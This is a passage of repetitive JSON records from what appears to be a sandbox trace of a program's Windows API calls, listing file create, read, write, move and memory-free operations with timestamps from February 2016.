17:41:42,694", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,704", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,704", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,704", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,704", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,704", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,704", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,704", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,704", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,704", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,714", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,714", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,714", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,714", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,714", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,714", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,714", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,714", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,724", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,724", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,724", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,724", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,724", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,724", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,724", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,734", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,734", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,734", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,734", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,734", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,734", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,734", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,734", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,734", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,744", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,744", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,744", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,744", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,744", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,744", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,754", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,754", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,754", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,754", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,754", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,754", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,754", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,764", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,764", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,764", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,764", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,764", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,764", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,764", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,764", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,764", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,764", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,764", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,774", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,774", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,774", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,774", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,774", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,774", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,774", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,774", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,774", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,774", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,774", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,774", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,774", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,784", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,784", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,784", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,784", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,784", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,784", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,784", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,784", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,784", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,784", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,784", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,794", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,794", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,794", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,794", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,794", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,794", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,794", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,794", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,794", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,794", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,794", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,794", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,794", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,794", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,794", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,804", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,804", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,804", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,804", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,804", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,804", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,804", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,804", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,804", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,804", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,804", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,804", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,804", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,804", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,814", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,814", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,814", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,814", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,814", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,814", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,814", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,814", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,814", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,814", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,814", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,814", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,814", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,814", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,824", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,824", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,824", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,824", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,824", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,824", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,824", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,824", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,824", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,824", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,824", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,824", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,824", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,834", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,834", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,834", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,834", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,834", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,834", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,834", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,834", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,834", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,834", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,834", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,834", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,844", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,844", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,844", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,844", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,844", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,844", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,844", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,844", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,844", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,844", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,844", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,844", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,854", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,854", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,854", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,854", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,854", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,854", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,854", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,854", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,854", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,854", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,854", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,864", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,864", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,864", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,864", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,864", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,864", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,864", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,864", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,864", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,864", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,864", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,864", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,874", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,874", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,874", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,874", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,874", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,874", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,874", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,874", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,874", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,874", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,874", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,874", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,884", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,884", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,884", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,884", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,884", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,884", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,884", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,884", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,884", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,884", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,894", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,894", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,894", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,894", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,894", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,894", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,894", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,894", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,894", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,894", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,894", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,904", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,904", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,904", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,904", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,904", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,904", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,904", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,904", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,904", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,904", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,904", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,914", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,914", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,914", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,914", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,914", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,914", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,914", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,914", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,924", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,924", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,924", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,924", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,924", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,924", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,924", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,924", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,924", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,924", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,934", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,934", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,934", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,934", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,934", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,934", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,934", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,934", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,934", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,934", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,934", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,944", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,944", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,944", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,944", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,944", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,944", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,944", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,944", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,944", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,944", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,944", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,944", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,944", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,954", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,954", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,954", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,954", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,954", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,954", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,954", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,954", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,954", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,964", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,964", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,964", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,964", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,964", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,964", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,964", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,964", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,964", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,964", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,974", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,974", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,974", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,974", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,974", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,974", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,974", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,974", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,984", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,984", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,984", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,984", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,984", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,984", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,984", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,984", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,984", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,984", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,984", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,984", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,984", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,994", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,994", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,994", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,994", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,994", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,994", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,994", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,994", "api": 